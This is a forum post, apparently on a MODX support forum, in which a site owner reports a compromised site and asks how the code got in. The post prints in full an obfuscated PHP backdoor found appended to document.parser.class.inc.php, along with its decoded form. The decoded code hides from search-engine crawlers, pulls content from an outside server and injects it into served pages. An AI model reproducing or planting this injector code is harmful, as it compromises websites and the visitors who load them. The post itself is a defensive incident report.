i found something very sus today.
Chrome was reporting malware on the site - google webmasters tools reported nothing
ive done some digging and found.
document.parser.class.inc.php
had
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInphal9lYnh4cyIpICYmICFmdW5jdGlvbl9leGlzdHMoImJhZG9sX2lxaiIpICYmICFmdW5jdGlvbl9leGlzdHMoImZtaV9rcmh6IikgJiYgIWlzc2V0KCRHTE9CQUxTWyJkZGJhIl0pICYmIEBzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJnb29nbGVib3QiKSA9PT0gZmFsc2UgJiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksIm1zbmJvdCIpID09PSBmYWxzZSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwieWFob28iKSA9PT0gZmFsc2UgJiYgIWlzc2V0KCRfQ09PS0lFWyJxaW5kIl0pICl7JEdMT0JBTFNbImRkYmEiXSA9IDE7c2V0Y29va2llKCJxaW5kIiwgMSwgdGltZSgpKzM2MDAqMjQqMiwgIi8iKTsgICAgICAgICAgICBmdW5jdGlvbiBiYWRvbF9pcWooJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAgICAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMikpOw0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsgJHVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmOCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IEBzdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNocigwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3ppcCA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgICAgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAgIGZ1bmN0aW9uIGZtaV9rcmh6KCAkdXJsICkgew0KDQogICAgICAgIGlmIChmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoJHVybCk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDUpOw0KICAgICAgICAgICAgJGN1cmxfcmVzdWx0ID0gY3VybF9leGVjICgkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgaWYgKCRjdXJsX3Jlc3VsdCkgcmV0dXJuICRjdXJsX3Jlc3VsdDsNCiAgICAgICAgfQ0KDQovKiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICAgICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAgICAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNCiAgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVCAkdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1siaG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCk7DQogICAgICAgIGlmICghJGZwKSByZXR1cm4gZmFsc2U7DQogICAgICAgIEBmcHV0cygkZnAsICRxdWVyeSk7DQogICAgICAgIEBzb2NrZXRfc2V0X3RpbWVvdXQgKCRmcCwgNSwgMCk7DQogICAgICAgICRzX3JldGNvZGUgPSBAc3Vic3RyIChAZmdldHMgKCRmcCwgNDA5NiksIDksIDMpOw0KICAgICAgICBpZiAoJHNfcmV0Y29kZXswfSA8PiAiMiIpIHtyZXR1cm4gRkFMU0U7fQ0KICAgICAgICB3aGlsZSAoISBAZmVvZiAoJGZwKSkNCiAgICAgICAgew0KICAgICAgICAgICAgaWYgKCJcclxuIiA9PT0gQGZnZXRzICgkZnAsIDQwOTYpKSB7YnJlYWs7fQ0KICAgICAgICB9DQogICAgICAgICRzb2NrZXRfcmVzdWx0ID0gIiI7DQogICAgICAgIHdoaWxlICghIEBmZW9mICgkZnApKSB7DQogICAgICAgICAgICAkc29ja2V0X3Jlc3VsdCAuPSBAZmdldHMgKCRmcCwgNDA5Nik7DQogICAgICAgIH0NCiAgICAgICAgQGZjbG9zZSgkZnApOw0KICAgICAgICBpZiAoJHNvY2tldF9yZXN1bHQpIHJldHVybiAkc29ja2V0X3Jlc3VsdDsNCiAgICB9DQogICAgZnVuY3Rpb24gemFqX2VieHhzKCR1eG9pKXtnbG9iYWwgJGh2dnVyX3htZTtyZXR1cm4gcHJlZ19yZXBsYWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9keT4pI2lzIiwgIiQxIiAuICRodnZ1cl94bWUsIGJhZG9sX2lxaigkdXhvaSksIDEpOw0KICAgIH0kaHZ2dXJfeG1lPWZtaV9rcmh6KGJhc2U2NF9kZWNvZGUoImFIUjBjRG92TDJkamIzVnVkR1Z5TG1OdUwybHVabTh1Y0dodyIpIC4gIj9pPSIgLiAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSk7QHByZWdfbWF0Y2goIiM8b3Blbj4oLiopPC9jbG9zZT4jIiwgJGh2dnVyX3htZSwgJG1hdGNoZXMpOyRodnZ1cl94bWU9IGlzc2V0KCRtYXRjaGVzWzFdKSA/ICRtYXRjaGVzWzFdIDogIiI7aWYgKCRodnZ1cl94bWUpICBvYl9zdGFydCgiemFqX2VieHhzIik7fQ=="));
tacked in the bottom, the interesting thing is the timestamp on the file is normal (as per last modx update)
that offcourse decodes to
if(function_exists("ob_start") && !function_exists("zaj_ebxxs") && !function_exists("badol_iqj") && !function_exists("fmi_krhz") && !isset($GLOBALS["ddba"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["qind"]) ){$GLOBALS["ddba"] = 1;setcookie("qind", 1, time()+3600*24*2, "/"); function badol_iqj($gzencode_arg)
{
$x = @ord(@substr($gzencode_arg, 3, 1));
$shift = 10;
$shift2 = 0;
if( $x&4 )
{
$unpack=@unpack("v", substr($gzencode_arg, 10, 2));
$unpack=$unpack[1]; $shift+= 2 + $unpack;
}
if( $x&8 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&16 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&2 )
{
$shift += 2;
}
$gzip = @gzinflate(@substr($gzencode_arg, $shift));
if($gzip === FALSE)
{
$gzip = $gzencode_arg;
}
return $gzip;
}
function fmi_krhz( $url ) {
if (function_exists("curl_init"))
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$curl_result = curl_exec ($ch);
curl_close($ch);
if ($curl_result) return $curl_result;
}
/* if (@ini_get("allow_url_fopen"))
{
$file_result = @file_get_contents($url);
if ($file_result) return $file_result;
} */
$url_info = parse_url($url);
$query = "GET $url HTTP/1.0\r\n";
$query .= "Host: " . $url_info["host"] . "\r\n";
$query .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($url_info["host"], 80);
if (!$fp) return false;
@fputs($fp, $query);
@socket_set_timeout ($fp, 5, 0);
$s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
if ($s_retcode{0} <> "2") {return FALSE;}
while (! @feof ($fp))
{
if ("\r\n" === @fgets ($fp, 4096)) {break;}
}
$socket_result = "";
while (! @feof ($fp)) {
$socket_result .= @fgets ($fp, 4096);
}
@fclose($fp);
if ($socket_result) return $socket_result;
}
function zaj_ebxxs($uxoi){global $hvvur_xme;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $hvvur_xme, badol_iqj($uxoi), 1);
}$hvvur_xme=fmi_krhz(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $hvvur_xme, $matches);$hvvur_xme= isset($matches[1]) ? $matches[1] : "";if ($hvvur_xme) ob_start("zaj_ebxxs");}
which is some nasty malware!!
Im one to consider my servers rather secure, i have locked them down SUphp, phphosin and secured disabled fucntions etc, i make use of CXS for monitoring FTP and form uploads for known finger prints and any encoded uploads...
It didnt detect anything, interestingly when i run it now on my home dir this does locate the file above. so this means it was NOT uploaded via FTP - im thinking there a loose injection somewhere.
let me know if you need any info
Im going to do a delete of all modx files and reupload fresh, in case there’s any old files (i usually use the overwrite upgrade method, so there could be old files floating)
MODX Staff